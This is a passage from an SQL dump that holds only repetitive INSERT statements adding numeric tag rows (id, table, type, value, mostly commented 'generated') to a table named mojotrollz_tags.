`value`, `comment`) VALUES (7432, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7432, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7433, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7433, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7434, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7434, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7435, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7435, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7436, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7436, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7437, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7437, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7438, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7438, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7439, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7439, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7440, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7440, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7441, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7441, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7442, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7442, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7443, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7443, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7444, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7444, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7445, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7445, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7446, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7446, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7447, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7447, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7448, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7448, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7449, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7449, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7450, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7450, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7451, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7451, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7452, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7452, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7453, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7453, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7454, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7454, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7455, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7455, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7456, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7456, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7457, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7457, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7458, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7458, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7459, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7459, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7460, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7460, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7461, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7461, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7462, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7462, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7463, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7463, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7464, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7465, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7466, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7467, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7468, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7469, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7483, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7484, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7485, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7485, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7486, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7487, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7489, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7489, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7503, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7504, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7505, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7505, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7506, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7506, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7523, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7523, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7524, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7524, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7527, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7543, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7544, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7545, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7546, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7547, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7548, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7549, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7550, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7551, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7552, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7553, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7553, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7554, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7555, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7555, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7556, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7558, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7559, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7560, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7561, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7562, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7562, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7562, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7562, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7562, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7562, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7564, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7564, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7565, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7565, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7565, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7565, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7565, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7565, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7566, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7567, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7567, 1, 2, 1637, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7567, 1, 3, 0, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7567, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7567, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7567, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7568, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7569, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7570, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7572, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7572, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7583, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7583, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7584, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7584, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7603, 1, 1, 90, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7603, 1, 2, 133, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7603, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7604, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7604, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7604, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7605, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7605, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7605, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7606, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7606, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7606, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7607, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7607, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7607, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7608, 1, 1, 209, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7608, 1, 2, 978, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7608, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7623, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7623, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7643, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7643, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7664, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7665, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7665, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7666, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7666, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7667, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7667, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7668, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7668, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7669, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7669, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7670, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7670, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7671, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7671, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7683, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7683, 1, 2, 1497, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7683, 1, 4, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7683, 1, 10, 1, NULL); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7683, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7684, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7686, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7687, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7689, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7690, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7703, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7704, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7706, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7707, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7708, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7709, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7710, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7711, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7712, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7713, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7714, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7714, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7724, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7724, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7725, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7725, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7726, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7726, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7727, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7727, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7728, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7728, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7729, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7730, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7730, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7731, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7731, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7732, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7732, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7733, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7733, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7734, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7735, 1, 30, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7736, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7736, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7737, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7737, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7738, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7739, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7740, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7740, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7744, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7744, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7749, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7750, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7763, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7763, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7764, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7764, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7765, 1, 1, 1, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7765, 1, 30, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7766, 1, 1, 0, 'generated'); INSERT INTO `mojotrollz_tags` (`id`, `table`, `type`, `value`, `comment`) VALUES (7766, 1, 30, 0, 'generated'); INSERT INTO 